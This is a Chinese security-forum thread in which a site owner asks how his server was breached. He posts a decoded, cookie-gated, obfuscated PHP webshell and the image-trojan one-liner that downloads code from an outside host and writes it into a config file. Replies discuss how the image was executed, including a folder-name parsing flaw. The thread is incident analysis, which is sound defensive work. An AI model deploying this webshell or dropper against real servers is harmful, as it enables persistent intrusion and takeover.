首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. 付费问答
    3. 发新帖
[已解决] [求助][求助] 服务器被入侵有日志这些求入侵过程 50.00雪花
发表于: 2020-8-25 18:13 2967

[已解决] [求助][求助] 服务器被入侵有日志这些求入侵过程 50.00雪花

漠北蝈蝈 活跃值
2020-8-25 18:13
2967

<?php
/* 本程序由 Ranyun_JieMi_EnphpV1 3.0算法解密 */
?><?php

/* -- mzphp 混淆加密:https://git.oschina.net/mz/mzphp2 */
error_reporting(E_ALL ^ E_NOTICE);
error_reporting(E_ERROR | E_PARSE);
@set_time_limit(0);
header('content-Type: text/html; charset=gb2312');
if (isset($_COOKIE['PHPSSESID']) == !1) {
    exit;
}
$c = 'ch' . 'r';
$b = $c(98) . $c(97) . $c(115) . $c(101) . $c(54) . $c(52) . $c(95) . 'd' . $c(101) . $c(99) . $c(111) . $c(100) . $c(101);
$r = $b('cHJlZ19yZXBsYWNl');
$f = $b('Y3JlYXRlX2Z1bmN0aW9u');
if ($_COOKIE['PHPSSESID'] == $b('c3dhbg==')) {
    $html = $b('JHBhc3N3b3JkPSdzd2FuJzs=') . '@e#html' . $c(118) . $c(97) . $b('bChnemluZmxhdGUo') . $b . '("jVRpb9pAEP0eKf9hY6HYlmi4EqQWWUrUOhSlmOCDFKrKWuwBr7J4Xe9Sjor/3jWQYA617Bdr53jz5u2MIU1Z6qeQsFSQeKyV9cblRQQ4hFRTAhYLiMUHd5HAJyRgLkqRmNAGCiKcchDGeFitVapKlsOBc8JinwucCi2zkBHSrgiXcVrBd0zHaXWsH0oSJRyY8lPX0Z/LCyRPIUAGUtXG9jblkOKxLJtZ22xJKMWl25sy0gI2SbAgQwoN1HZaJqrflBvohcQhm3FkuejupqrvcFIqEYaYQ/3WDyFgIWj7N6XvRU67aZnD2qDdrnaXg6+vFfxi93Et7PTMctltVjqhN69738NOd9mb9nvh4LlrGIqu56pYMDOQUkpeP/56erJILVkMyKSkbCPWKnCRJoxrhaD4lqGj62s0msaByESDOeGCa2ognT6JiVD/4Yc5BOpOvo2Ekez1PVt7o5edtVU+AkvkOwRREX327G+dZ9eXnw2ds6LdVtvseG4RVe7OirdN17Mt136wnEfTLiLX9szzaDmm/dA0LbeYm4V85npe3pXIko9wA8o45D2r/z+GFM4fy1lVMaVs5mcwI5ZAfCi1gEnCJYP7EaGyxoF+6woyQiy0TaSu75zv7O/JJKHZCKpqcYt4BJKjqYRAv5D0IQ4fZU3lNGRGJ2vA324t3+OWE+BU/1eGgUaYctjv9XhtZaXxksQjisXhOhUCPVdttfkBnLH/8BvTkxESbPUX' . $b('IikpKTs7');
    $e = @$f('', $r('/#html/', '', $html));
    $e();
} else {
    $html = '@e#html' . $c(118) . $c(97) . $b('bChnemluZmxhdGUo') . $b . '("c0gtS8zRSK/KzEvLSSxJ1UhKLE41M4lPSU3OT0nVUIl39vf39nSNVg/wCAgOdg32dFGP1dTUtAYA' . $b('IikpKTs7');
    $e = @$f('', $r('/#html/', '', $html));
    $e();
}
exit;

这是小马解密过的,需要cookie才能访问

 

通过论坛老哥分析是通过ueditor编辑器插件上传的jpg图片马,
http://1.142ozgx.cn/Public/static/ueditor/这是编辑器地址,确实可以上传图片马,但是他是怎么解析的喃?

<?php file_put_contents('./Addons/Attachment/config.php',file_get_contents('http://www.hhgyrt.space/pic.txt'));unlink('test1.php')?>

这是图片马的内容,把webshell写入到文件夹了

 

最主要的一个问题他是怎么解析的这个图片?
怎么执行的?
来个老哥分析下过程

 

https://wwa.lanzous.com/ic2Xsfyqwuh 日志文件和木马都在里面


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2020-8-25 20:55 被漠北蝈蝈编辑 ,原因:
收藏
免费 0
支持
分享
最新回复 (8)
漠北蝈蝈
雪    币: 73
活跃值: (281)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
赏金300  金额填错了
2020-8-25 18:14
0
troylee
雪    币: 560
活跃值: (1445)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
3
.htaccess 里面有没有把图片格式jpg用php解析的代码
2020-8-25 19:51
0
漠北蝈蝈
雪    币: 73
活跃值: (281)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
troylee .htaccess 里面有没有把图片格式jpg用php解析的代码
这个就看不见了,因为我还原了
2020-8-25 20:54
0
漠北蝈蝈
雪    币: 73
活跃值: (281)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
troylee .htaccess 里面有没有把图片格式jpg用php解析的代码
我看了下备份的,htaccess 是空的
2020-8-25 21:07
0
hk有缘人
雪    币: 29
活跃值: (91)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
私信
6

你这个日志只有8月16日到23日的日志,日志应该已经被清理过了。日志最早的日期是 16/Aug/2020:20:40:18 还是在晚上,说明系统被入侵后,黑客清理了日志。

最后于 2020-8-26 16:07 被hk有缘人编辑 ,原因:
2020-8-26 16:05
0
hk有缘人
雪    币: 29
活跃值: (91)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
私信
7
我好像记得php有个版本有个漏洞,如果有个文件夹名为php,那么该目录下的文件都被作为PHP文件解析。不知你的jpg文件被执行是不是这个问题。
2020-8-26 16:34
0
漠北蝈蝈
雪    币: 73
活跃值: (281)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
8
hk有缘人 你这个日志只有8月16日到23日的日志,日志应该已经被清理过了。日志最早的日期是 16/Aug/2020:20:40:18 还是在晚上,说明系统被入侵后,黑客清理了日志。
这就是23号的时候被入侵的,日志里面有的,
Public/static/ueditor/php/upload   确实图片马被传在带有php文件夹名字的子文件夹里面的,老哥试过么这个漏洞还能上传么?
2020-8-26 17:30
0
wx_三五瓶
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
(+50.00雪花)
9
自己找到方法了,已经解决了
2020-8-30 23:56
(+50.00雪花)
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//